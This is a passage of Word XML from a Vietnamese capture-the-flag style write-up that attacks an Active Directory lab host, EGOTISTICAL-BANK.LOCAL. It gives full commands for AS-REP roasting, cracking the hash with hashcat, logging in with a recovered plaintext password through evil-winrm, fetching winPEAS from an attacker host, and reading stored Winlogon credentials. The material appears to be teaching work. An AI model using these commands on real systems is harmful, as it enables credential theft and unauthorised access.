          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C716FD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>fsmith@EGOTISTICAL-BANK.LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AED99D" w14:textId="4C519A7A" w:rsidR="00C716FD" w:rsidRDefault="00B635B2" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="001C6178">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>Fsmith@EGOTISTICAL-BANK.LOCAL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50969CA7" w14:textId="3D049A25" w:rsidR="00B635B2" w:rsidRDefault="00B635B2" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="144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>W3layouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F53E638" w14:textId="33AE30D3" w:rsidR="00FF6B23" w:rsidRDefault="000611EC" w:rsidP="000611EC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc152522886"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.1. Initial Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="01AA7A6C" w14:textId="58B0EA97" w:rsidR="006B3798" w:rsidRPr="000A738A" w:rsidRDefault="006B3798" w:rsidP="000611EC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc152522887"/>
      <w:r w:rsidRPr="006B3798">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AS-REP Roasting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="3F7ED12D" w14:textId="05855035" w:rsidR="001C2950" w:rsidRDefault="001C2950" w:rsidP="0005243D">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Điều kiện để xảy ra việc này là users không bật tính pre-authentication khi sử dụng kerberoast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6662BE52" w14:textId="0F2E6DEB" w:rsidR="001C2950" w:rsidRDefault="001C2950" w:rsidP="0005243D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C2950">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Để xác định user có bật hay không, nếu không ta có thể lấy được TGT của user thông qua GetNPUsers.py từ đó thực hiện crack để lấy được password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414AB75A" w14:textId="1601008D" w:rsidR="00F44F3A" w:rsidRDefault="00F44F3A" w:rsidP="0005243D">
      <w:pPr>
        <w:ind w:left="36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 xml:space="preserve">Sử dụng GetNPUsers của impacket: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F44F3A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://github.com/fortra/impacket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD54CA1" w14:textId="37227E0E" w:rsidR="00B635B2" w:rsidRDefault="00B635B2" w:rsidP="0005243D">
      <w:pPr>
        <w:ind w:left="36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>Chạy lệnh sau để dump hash của các user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF77231" w14:textId="6F054D54" w:rsidR="00B635B2" w:rsidRDefault="00B635B2" w:rsidP="00B635B2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 w:rsidRPr="00B635B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>python GetNPUsers.py -dc-ip 10.129.95.180 'EGOTISTICAL-BANK.LOCAL/' -usersfile users -no-pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F1AD9E" w14:textId="77777777" w:rsidR="00B635B2" w:rsidRDefault="00B635B2" w:rsidP="0005243D">
      <w:pPr>
        <w:ind w:left="36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>Kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C6E5B" w14:textId="7B2BD392" w:rsidR="00011093" w:rsidRDefault="00B635B2" w:rsidP="00B635B2">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B635B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CDB8F63" wp14:editId="0E18D47C">
            <wp:extent cx="5760720" cy="1888490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Picture 1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5B2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB8AA3F" w14:textId="6C2E1A01" w:rsidR="00C60BEF" w:rsidRDefault="00C60BEF" w:rsidP="00C60BEF">
      <w:pPr>
        <w:ind w:left="36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>Thu được hash của fsmith.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A8008E" w14:textId="4014EAF5" w:rsidR="008E35CB" w:rsidRPr="008E35CB" w:rsidRDefault="00E079D3" w:rsidP="008E35CB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc152522888"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Crack</w:t>
      </w:r>
      <w:r w:rsidR="008E35CB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004455FE">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r w:rsidR="008E35CB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2F7151FF" w14:textId="7EA66C26" w:rsidR="004455FE" w:rsidRDefault="004455FE" w:rsidP="008E35CB">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004455FE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Có thể sử dụng john hoặc hashcat để crack TGT với wordlist rockyou.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742E7D9D" w14:textId="7D86978F" w:rsidR="008E35CB" w:rsidRPr="008E35CB" w:rsidRDefault="008E35CB" w:rsidP="008E35CB">
      <w:pPr>
        <w:ind w:left="36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>Lưu nội dung file hash vào test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C09109E" w14:textId="79A15496" w:rsidR="00C60BEF" w:rsidRDefault="00C60BEF" w:rsidP="00C60BEF">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22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>Sử dụng hashcat để crack</w:t>
      </w:r>
      <w:r w:rsidR="008E35CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36F135" w14:textId="5D53D845" w:rsidR="008E35CB" w:rsidRDefault="008E35CB" w:rsidP="008E35CB">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E35CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">hashcat -m 18200 test ../rockyou.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="008E35CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDEF92F" w14:textId="324C7290" w:rsidR="008E35CB" w:rsidRDefault="008E35CB" w:rsidP="008E35CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E35CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1032665D" wp14:editId="6C88EEC2">
            <wp:extent cx="4445638" cy="1681815"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25" name="Picture 25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 erro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9380" cy="169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F136" w14:textId="6A5A2986" w:rsidR="008125CB" w:rsidRDefault="008125CB" w:rsidP="008E35CB">
      <w:pPr>
        <w:ind w:left="36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lastRenderedPageBreak/>
        <w:t>Ta thu được credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5517C0E4" w14:textId="0C946F56" w:rsidR="008E35CB" w:rsidRDefault="008E35CB" w:rsidP="008125CB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>Username: fsmith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B9D4BF" w14:textId="2085B54D" w:rsidR="00E079D3" w:rsidRDefault="008E35CB" w:rsidP="008125CB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>Password:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E35CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E35CB">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Thestrokes23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759B6C3F" w14:textId="66C6D149" w:rsidR="00E079D3" w:rsidRPr="000D0CC1" w:rsidRDefault="000D0CC1" w:rsidP="00E079D3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc152522889"/>
      <w:r w:rsidRPr="000D0CC1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Windows Remote Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="4DF216C0" w14:textId="0D25A249" w:rsidR="000D0CC1" w:rsidRPr="000D0CC1" w:rsidRDefault="000D0CC1" w:rsidP="00E079D3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0CC1">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Sử</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> dụng công cụ evil-winrm cùng với credentials vừa thu được ta kết nối thành công đến mục tiêu </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57374C35" w14:textId="48FD5A46" w:rsidR="00E079D3" w:rsidRDefault="000D0CC1" w:rsidP="00E079D3">
      <w:pPr>
        <w:ind w:left="36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>Chạy lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7CF830" w14:textId="58B7E697" w:rsidR="000D0CC1" w:rsidRPr="0098182A" w:rsidRDefault="000D0CC1" w:rsidP="000D0CC1">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22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 xml:space="preserve">evil-winrm </w:t>
      </w:r>
      <w:r w:rsidR="00A94766" w:rsidRPr="00A94766">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>-i 10.129.95.180 -u fsmith -p Thestrokes23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CEDC92" w14:textId="00EB139E" w:rsidR="00CD11AD" w:rsidRDefault="00CD11AD" w:rsidP="00CD11AD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 w:rsidRPr="00CD11AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="555C427A" wp14:editId="46F0127C">
            <wp:extent cx="4407601" cy="1153885"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="27" name="Picture 2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8898" cy="116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C54E" w14:textId="4D9F1DA0" w:rsidR="0007453A" w:rsidRPr="00147C0B" w:rsidRDefault="009E35E3" w:rsidP="009E35E3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc152522890"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.2. Privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="25C048AF" w14:textId="32170E0F" w:rsidR="0007453A" w:rsidRPr="00147C0B" w:rsidRDefault="0007453A" w:rsidP="0007453A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc152522891"/>
      <w:r w:rsidRPr="00147C0B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r w:rsidR="00FA1D96">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00FA1D96" w:rsidRPr="00FA1D96">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00FA1D96" w:rsidRPr="00BC2AE5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>svc_l</w:t>
      </w:r>
      <w:r w:rsidR="00FA1D96" w:rsidRPr="00BC2AE5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>oanmanager</w:t>
      </w:r>
      <w:r w:rsidR="00FA1D96">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="454A9D5B" w14:textId="07D59A9F" w:rsidR="001D1232" w:rsidRDefault="0098182A" w:rsidP="001D1232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</w:rPr>
        <w:t>Thu thập</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> thông tin bằng </w:t>
      </w:r>
      <w:r w:rsidR="00EE06C1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">winPEA: </w:t>
      </w:r>
      <w:r w:rsidR="00C33AFC" w:rsidRPr="00C33AFC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>https://github.com/carlospolop/PEASS-ng/releases/tag/20231203-9cdcb38f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371FCB48" w14:textId="77777777" w:rsidR="0098182A" w:rsidRDefault="0098182A" w:rsidP="001D1232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 xml:space="preserve">Mở server tại máy attacker: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D6BD3A" w14:textId="0D2A9EEE" w:rsidR="0098182A" w:rsidRDefault="0098182A" w:rsidP="0098182A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0098182A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>python -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28721D99" w14:textId="75E7034B" w:rsidR="0098182A" w:rsidRDefault="0098182A" w:rsidP="001D1232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>Tại máy victim tải file về</w:t>
      </w:r>
      <w:r w:rsidR="001B5ED8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> và chạy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C395EFC" w14:textId="1534180C" w:rsidR="0098182A" w:rsidRDefault="0098182A" w:rsidP="0098182A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0098182A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="007D1A2E" w:rsidRPr="001C6178">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:lang w:val="vi-VN"/>
          </w:rPr>
          <w:t>http://10.10.14.25/winPEASx86.exe -o sheng.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0A8B2F5F" w14:textId="3424E74E" w:rsidR="00B91827" w:rsidRDefault="00B91827" w:rsidP="00B91827">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B91827">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4040426E" wp14:editId="1C4D02B3">
            <wp:extent cx="3031744" cy="3227615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="Picture 2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2976" cy="325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ACA" w:rsidRPr="00062ACA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00062ACA" w:rsidRPr="00062ACA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C67AC9C" wp14:editId="0B825B15">
            <wp:extent cx="2183629" cy="1937657"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715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6119" cy="19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5646" w14:textId="77777777" w:rsidR="008E7865" w:rsidRDefault="008E7865" w:rsidP="007D1A2E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</w:p>
    <w:p w14:paraId="18153A02" w14:textId="5C3C8348" w:rsidR="007D1A2E" w:rsidRDefault="007D1A2E" w:rsidP="007D1A2E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lastRenderedPageBreak/>
        <w:t>Để xem thông tin những credentials tự động đăng nhập chạy lệnh sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACCBAA0" w14:textId="284C7445" w:rsidR="007D1A2E" w:rsidRPr="0098182A" w:rsidRDefault="007D1A2E" w:rsidP="007D1A2E">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D1A2E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000E9B4D" w14:textId="35E2F56C" w:rsidR="00B3429F" w:rsidRPr="00147C0B" w:rsidRDefault="00B3429F" w:rsidP="001D1232">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E40FEF0" w14:textId="448F9146" w:rsidR="00E20AB8" w:rsidRDefault="007D1A2E" w:rsidP="004477D4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 w:rsidRPr="007D1A2E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="560DC3D7" wp14:editId="4A12CC34">
